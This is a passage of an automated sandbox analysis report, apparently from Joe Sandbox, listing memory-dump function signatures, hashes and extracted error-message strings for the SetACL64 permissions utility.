                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$Lockitstd::_$Lockit::_Lockit::~_SetgloballocaleValidstd::locale::_
                              • String ID: > was not found in domain <$Account <$ProcessACEsOfGivenDomains
                              • API String ID: 2555488030-3371799133
                              • Opcode ID: 466707cee54b4337e627ad1c5b082164c4624fdca99e4cbe8ccd6642e64db4c1
                              • Instruction ID: 12a8c097993028974de0ef0c4b996ad98e77878da734c8b3db69e35883426d23
                              • Opcode Fuzzy Hash: 466707cee54b4337e627ad1c5b082164c4624fdca99e4cbe8ccd6642e64db4c1
                              • Instruction Fuzzy Hash: 8C0290A2A25B4285EB20CB65D8953AD7361FB947E8F505275EA5C83BE9DF7CE1C0C300
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ObjectSingleWait$EventMutexReleaseReset
                              • String ID:
                              • API String ID: 4195719913-0
                              • Opcode ID: 53c02e3128979e1348d48c8753feaf8a9deea66a6de0b7d4b8ab2bd848f986ba
                              • Instruction ID: 079ec4eb84ba635a6b477eb1e615c43fb8d35ae0d5e32195634d63f5d356f130
                              • Opcode Fuzzy Hash: 53c02e3128979e1348d48c8753feaf8a9deea66a6de0b7d4b8ab2bd848f986ba
                              • Instruction Fuzzy Hash: 30B148B2A15BC285EB708F25D8493ED2361FB59BA8F414675DA6CC77E5EF389680C300
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                              • String ID: AddACE$Audit ACEs cannot be set on shares.$Invalid access mode for this ACL type specified (e.g. you cannot add audit ACEs to the DACL, only to the SACL).$Invalid inheritance specified.$No trustee specified.
                              • API String ID: 3936042273-1410195417
                              • Opcode ID: c4ff67e74c09a2f73a2b1b69ce317e7775f2c5bfd494f419ddfd883c6a867768
                              • Instruction ID: 6633abd429172d2b7fdc696e9a39cba9d6b4557221adb9c3cfcdb68af5f0b88e
                              • Opcode Fuzzy Hash: c4ff67e74c09a2f73a2b1b69ce317e7775f2c5bfd494f419ddfd883c6a867768
                              • Instruction Fuzzy Hash: 8B228CB2A0968285EB20CF79E8843AD7371FB45798F804675DA8CC7A99DF7CE594C300
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                              • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                              • API String ID: 2565136772-3242537097
                              • Opcode ID: a89e39b1e6dab9013fa2c69796a28cd76b0915c44a41f147d36bdeccd3bdc5f6
                              • Instruction ID: 1bac08d3dfce127cab66ed442dab11835e7cc2ac3090a74a3084147d2f74ad41
                              • Opcode Fuzzy Hash: a89e39b1e6dab9013fa2c69796a28cd76b0915c44a41f147d36bdeccd3bdc5f6
                              • Instruction Fuzzy Hash: 0E2116A0F0AB0381FE75DB24ED5417963B1EF58BE5F9854B5C90EC67A0EE2CA495C220
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn
                              • String ID: > is probably incorrect.$AddDomain$Domain name <
                              • API String ID: 3668304517-3402377043
                              • Opcode ID: 331517c9e7e271e5a7fd40b88897b6cbc41d5860be722eeb7a384d55d81c47f0
                              • Instruction ID: cfb4aaacbfa1f56eb1afd97ae68985b946e50c43a2f0a8d7810b44ec06fbec78
                              • Opcode Fuzzy Hash: 331517c9e7e271e5a7fd40b88897b6cbc41d5860be722eeb7a384d55d81c47f0
                              • Instruction Fuzzy Hash: 2CD15DE2B1574285EE24DB69E4993AD2322FB447E4F805671DA6CC7AE9DF7CE180C300
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$ConvertFreeLocalString
                              • String ID:
                              • API String ID: 347880976-0
                              • Opcode ID: 7f36a04dbe1e1195e17bb9c4e0bc062f01be79f362d0442487ffcee1471e9626
                              • Instruction ID: ba04b95e8da466ac90575850960200bbc92127fd4054168413d05cb82125b25a
                              • Opcode Fuzzy Hash: 7f36a04dbe1e1195e17bb9c4e0bc062f01be79f362d0442487ffcee1471e9626
                              • Instruction Fuzzy Hash: BB225EA2A08B8185EB108B68E4543AD77B1FB457E8F105365EF9C93AE9DF78E1D4C700
                              APIs
                              • IsValidAcl.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,00000000,00000000,00007FF697069A60), ref: 00007FF69706A0E7
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Valid
                              • String ID:
                              • API String ID: 1304828667-0
                              • Opcode ID: 562027f6ea632b8d146ccf656e1ba2dcc13df42484284c78869221e205c5226f
                              • Instruction ID: adfba304615729033c36c533d279a71f2f1ee043844aead10a459f7879cb0513
                              • Opcode Fuzzy Hash: 562027f6ea632b8d146ccf656e1ba2dcc13df42484284c78869221e205c5226f
                              • Instruction Fuzzy Hash: CA517EE6A18A4282EB60AB26E82563A77A1FBD4FD4F048171DE4EC7754EF3CE5458700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn
                              • String ID: AddDomain$No domain specified.
                              • API String ID: 3668304517-2536513783
                              • Opcode ID: 99e0925a6b9fdd9a5b0408bba0820a297a0d0a02d1bb6155b4d59c8334b4e1bd
                              • Instruction ID: 15ee6df106d58605f9ffdc5119f840e4e5b5481545b0a81cafab0685ce2640e1
                              • Opcode Fuzzy Hash: 99e0925a6b9fdd9a5b0408bba0820a297a0d0a02d1bb6155b4d59c8334b4e1bd
                              • Instruction Fuzzy Hash: 505163F2B1964291EA249B69E8993AD6322FF407D4F805571D74CC7AE9DF7CE181C304
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$QueryValue$DefaultLangUser
                              • String ID: \StringFileInfo\%04X04B0\%s$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
                              • API String ID: 124864902-1470331934
                              • Opcode ID: 84a91a20877e75cd1db0540d89d5f8e58374f05ff5f461cff2050a2cec5ccb81
                              • Instruction ID: 8ae59c3815ffa61f3c5a6dae90f19232948987a36f81f5efd7e8266b4ffd7bf0
                              • Opcode Fuzzy Hash: 84a91a20877e75cd1db0540d89d5f8e58374f05ff5f461cff2050a2cec5ccb81
                              • Instruction Fuzzy Hash: E49190B2A18B4180EB20CF58E4442AE7761FB957E4F505275EA9DC3AA9EF7CE184C700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$GetctypeLocinfo::_Locinfo_ctor
                              • String ID: bad locale name
                              • API String ID: 249287498-1405518554
                              • Opcode ID: 8bc982661b0ee05dfb2898125f394b4b40cc44dd271d2c8eedadb7c000856f72
                              • Instruction ID: e4ae98d1b8f9eeea78825533a8ebc3af349dff339e025128eda4652d0f92f745
                              • Opcode Fuzzy Hash: 8bc982661b0ee05dfb2898125f394b4b40cc44dd271d2c8eedadb7c000856f72
                              • Instruction Fuzzy Hash: 55717FA2B09A4185FB25DB64D8912BC2364FFA47C4F0840B5DE4DE3A95EF38E9629304
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7a5f5edd017b658e983cfd53b7e8145c4734415c703908048787467d75527855
                              • Instruction ID: 0ead903d55627d1a8f9d34a6fc7967429d4e99c29ea6314a772edc9e1a943e1f
                              • Opcode Fuzzy Hash: 7a5f5edd017b658e983cfd53b7e8145c4734415c703908048787467d75527855
                              • Instruction Fuzzy Hash: 96B19AB2A15B8189EB24CF64E8947AC33B5FB48B8CF505565EF8C87A98DF38D590C344
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ErrorLast$Valid$DeleteEqualInformation
                              • String ID:
                              • API String ID: 439278688-0
                              • Opcode ID: 02abaca1715827c988373279d1206fa39163a6e830349d42f3409750fdde2c61
                              • Instruction ID: f2919b4933fc52e985f3eb38d1bddd583487f3dc07c6d356ec1e0781433c8b1e
                              • Opcode Fuzzy Hash: 02abaca1715827c988373279d1206fa39163a6e830349d42f3409750fdde2c61
                              • Instruction Fuzzy Hash: FC815FB1A2868686EB708B25956437D77E0FF84BD4F044679CA8DC7B84EF3CE5909740
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Valid$Equal$CopyLength
                              • String ID:
                              • API String ID: 1685539899-0
                              • Opcode ID: 3b1f6e0476a15e4dbeff593321d0a39690655f45c3396d74e8fe94f401111051
                              • Instruction ID: d699359894a3c81608b9cdb4ff989d760222801c38a581b50d0dd6825efb63ce
                              • Opcode Fuzzy Hash: 3b1f6e0476a15e4dbeff593321d0a39690655f45c3396d74e8fe94f401111051
                              • Instruction Fuzzy Hash: EE616FA2B19A4645EB749B22996473D73E1FF84FE4F0942B9DD0DC7A84EE2CE581C700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$Lockitstd::_$Lockit::_Lockit::~_Setgloballocalestd::locale::_
                              • String ID: \\?\$\\?\UNC\
                              • API String ID: 3857612545-3019864461
                              • Opcode ID: 80f86e82870b07e6d5627ecd3545ff3dece0f910a388d86736f9a77694643264
                              • Instruction ID: 9e162e433688ea9079be8ed6d63d10dcb0cae90283fcd4b52bff13c0dace42b8
                              • Opcode Fuzzy Hash: 80f86e82870b07e6d5627ecd3545ff3dece0f910a388d86736f9a77694643264
                              • Instruction Fuzzy Hash: 7212ACA2F14A5280EF249B68E8443AD2372FB65BD8F504175DE1DD77E8EF78E4849340
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn
                              • String ID: AddTrustee$No trustee specified.
                              • API String ID: 3668304517-2850116058
                              • Opcode ID: fb94bdf829771a45d73d4169ee65a2f39625c9cf73fdf6b67dd04f57a629b6a1
                              • Instruction ID: a9395adcb96aa2e06cc0b525b848ce60a11681686e8485639cffa7614b071b2d
                              • Opcode Fuzzy Hash: fb94bdf829771a45d73d4169ee65a2f39625c9cf73fdf6b67dd04f57a629b6a1
                              • Instruction Fuzzy Hash: B5E18FB2B1968291EF249B29E8843AD6372FB857D8F505175DB4CC7AA9DF7CE490C300
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                              • String ID: false$true
                              • API String ID: 164343898-2658103896
                              • Opcode ID: f445c541dcabc8c76a2eb441bad9b69acf557a9bd182a87f89098410cebb741f
                              • Instruction ID: 48377019935306821c3fbb23893d731f38c7d77ad84278068cebc409ba1df2b7
                              • Opcode Fuzzy Hash: f445c541dcabc8c76a2eb441bad9b69acf557a9bd182a87f89098410cebb741f
                              • Instruction Fuzzy Hash: D7D17862B1AB428AEB20DF61D8412AD33A5FF58788F0545B5DE4CE7B89EF38D516C304
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Valid$Equal$Length
                              • String ID: unordered_map/set too long
                              • API String ID: 2183326427-306623848
                              • Opcode ID: ad27f92fef91cd753ab91c311a8dad5f0718926ff1c6d6db717cf738553d2b84
                              • Instruction ID: a30a2e7d39a3cb64f3494c9496d4d86a9eaa81a8a0e1f28f1ec9a1d3ae7cebe5
                              • Opcode Fuzzy Hash: ad27f92fef91cd753ab91c311a8dad5f0718926ff1c6d6db717cf738553d2b84
                              • Instruction Fuzzy Hash: 98A17FA2B19B4585EE608F12E84437A63A4FF98BC4F588675DA8DC7754DF3CE4B08300
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$LoadString
                              • String ID: Operating system error message: $SetACL error message: $SetACL finished with error(s):
                              • API String ID: 498717675-3876775778
                              • Opcode ID: 5ce873107c147e58fbec8a04b54c5fd4bfe3e96f955e4566f1b3ca94a313b483
                              • Instruction ID: 952d6c32c8d22b03276485125c49ca445147562667a30cc8ee631b97011a35e2
                              • Opcode Fuzzy Hash: 5ce873107c147e58fbec8a04b54c5fd4bfe3e96f955e4566f1b3ca94a313b483
                              • Instruction Fuzzy Hash: C781A6A2B09BC685EB349F34D8453ED2352FBA17C8F809175D64CD7A9ADF69D684C300
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_Locinfo_ctor
                              • String ID: bad locale name
                              • API String ID: 3718194943-1405518554
                              • Opcode ID: 1a7bf999381c07af3242a3cc31933243c0f84e1edb9a9b3fcdc9fb87e6ad8860
                              • Instruction ID: 0b3019a460d377b0614b7a54f6973b9fc49de7070026924a3f0f2ad6768d1189
                              • Opcode Fuzzy Hash: 1a7bf999381c07af3242a3cc31933243c0f84e1edb9a9b3fcdc9fb87e6ad8860
                              • Instruction Fuzzy Hash: 07618EA2B09A4189FB25DF61D8512BC33B4FF947C4F0844B5DA4DE3A95DE38E862D308
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_Locinfo_ctor
                              • String ID: bad locale name
                              • API String ID: 3718194943-1405518554
                              • Opcode ID: 1a3bb911b4edc9c961d994df47ad412ba050329201994a1f2ddff9c2ca2b1207
                              • Instruction ID: 03103ae787afa363193b17837bc553153aea61e1f2dbbaf6d173e0b30ce89f29
                              • Opcode Fuzzy Hash: 1a3bb911b4edc9c961d994df47ad412ba050329201994a1f2ddff9c2ca2b1207
                              • Instruction Fuzzy Hash: DF716DA2B19A4189FB24DF61D8542BC23B4EFA47C8F0844B5DA4DD7A95EF38E426D304
                              APIs
                              Strings
                              Memory Dump Source
